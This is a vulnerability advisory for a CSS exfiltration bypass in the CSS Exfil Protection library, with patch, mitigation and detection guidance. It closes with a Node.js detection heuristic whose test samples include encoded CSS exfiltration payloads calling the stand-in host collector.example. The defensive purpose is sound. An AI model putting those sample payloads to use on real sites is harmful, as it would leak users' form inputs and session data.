CVE-2024-33437

7.5 HIGH

📋 TL;DR

CVE-2024-33437 is a vulnerability in CSS Exfil Protection v1.1.0 that allows remote attackers to exfiltrate sensitive information due to incomplete CSS style rule filtering. This affects websites using the vulnerable library for CSS-based data exfiltration protection, potentially exposing user data like form inputs or session tokens.

💻 Affected Systems

Products:
  • CSS Exfil Protection
Versions: v1.1.0
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Only affects systems using CSS Exfil Protection library version 1.1.0 for CSS-based data exfiltration protection.

⚠️ Risk & Real-World Impact

🔴 Worst Case

Attackers could steal sensitive user data (passwords, personal information, session tokens) from web forms and applications protected by the library, leading to account compromise and data breaches.

🟠 Likely Case

Targeted data exfiltration from vulnerable web applications, particularly stealing form data or authentication tokens through crafted CSS rules.

🟢 If Mitigated

Limited impact with proper input validation and additional security layers; data exposure restricted to what's accessible via CSS selectors.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation requires an attacker to inject malicious CSS rules into vulnerable web pages; a public proof-of-concept demonstrates the bypass technique.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: v1.1.1 or later

Vendor Advisory: https://github.com/mlgualtieri/CSS-Exfil-Protection/issues/41

Restart Required: No

Instructions:

1. Update CSS Exfil Protection to version 1.1.1 or later.
2. Replace the vulnerable library files with patched versions.
3. Test the updated implementation for functionality.

🔧 Temporary Workarounds

Disable or Remove CSS Exfil Protection (platform: all)

Temporarily disable the vulnerable library until patching is possible.

Remove or comment out CSS Exfil Protection script imports in HTML files.

Implement Additional Input Sanitization (platform: all)

Add server-side validation to filter CSS-related inputs.

Implement regex filtering for CSS rule patterns in user inputs.

🧯 If You Can't Patch

  • Implement Content Security Policy (CSP) headers to restrict inline styles and external CSS
  • Deploy WAF rules to detect and block CSS-based exfiltration attempts

🔍 How to Verify

Check if Vulnerable:

Check if CSS Exfil Protection version 1.1.0 is loaded in web page source or package.json

Check Version:

Check package.json for "css-exfil-protection" version or inspect loaded script version in browser developer tools

Verify Fix Applied:

Verify CSS Exfil Protection version is 1.1.1 or later and test with known CSS exfiltration payloads

📡 Detection & Monitoring

Log Indicators:

  • Unusual CSS rule patterns in user inputs
  • Multiple failed CSS validation attempts

Network Indicators:

  • Suspicious CSS-related payloads in HTTP requests
  • Unexpected external resource loading via CSS

SIEM Query:

source="web_server" AND (css OR style OR @import) AND suspicious_pattern
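
The indicators above and the regex-filtering workaround leave the pattern itself unspecified. The following is an added example, not code from CSS Exfil Protection or from this advisory: a Node.js heuristic that flags the generic CSS exfiltration shape (an attribute value selector paired with a remote url() load, or an @import rule) in user-controlled input. The function names, the sample values and the collector.example host are constructed for illustration, and the heuristic does not model the specific CVE-2024-33437 bypass.

```javascript
// Added example: heuristic for the generic CSS exfiltration pattern.
// It does not model the specific CVE-2024-33437 filter bypass.
const ATTR_VALUE_SELECTOR = /\[\s*[\w-]+\s*[\^$*~|]?=\s*[^\]]*\]/;
const REMOTE_URL = /url\(\s*['"]?\s*(?:https?:)?\/\//i;
const IMPORT_RULE = /@import[^;{}]*/i;

// Decode percent-encoding up to twice so encoded form values are
// inspected as CSS, then drop CSS comments that may sit between tokens.
function normalize(input) {
  let text = String(input).replace(/\+/g, " ");
  for (let pass = 0; pass < 2; pass++) {
    try {
      const decoded = decodeURIComponent(text);
      if (decoded === text) break;
      text = decoded;
    } catch {
      break; // malformed escape sequence: inspect what has been decoded
    }
  }
  return text.replace(/\/\*[\s\S]*?\*\//g, " ");
}

// Returns a list of { reason, rule } findings for one input value.
function findCssExfilIndicators(input) {
  const css = normalize(input);
  const findings = [];
  const importMatch = css.match(IMPORT_RULE);
  if (importMatch) {
    findings.push({ reason: "import-rule", rule: importMatch[0].trim() });
  }
  // Innermost "selector { declarations }" pairs.
  for (const [, selector, body] of css.matchAll(/([^{}]+)\{([^{}]*)\}/g)) {
    if (ATTR_VALUE_SELECTOR.test(selector) && REMOTE_URL.test(body)) {
      findings.push({ reason: "attr-selector-remote-url", rule: selector.trim() });
    }
  }
  return findings;
}

// Constructed sample values of a user-controlled form field.
const SAMPLES = [
  "Hello%20world",
  "body%7Bcolor%3Ared%7D",
  "input%5Bvalue%5E%3D%22a%22%5D%7Bbackground%3Aurl(https%3A%2F%2Fcollector.example%2Fa)%7D",
  "%2540import%20url(%2F%2Fcollector.example%2Fx.css)%3B",
];
for (const sample of SAMPLES) {
  console.log(JSON.stringify(findCssExfilIndicators(sample)));
}
```

Ordinary styling such as `input[type=text]{color:red}` or a same-rule remote background without an attribute selector produces no finding, so treat hits as a triage signal rather than a verdict.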
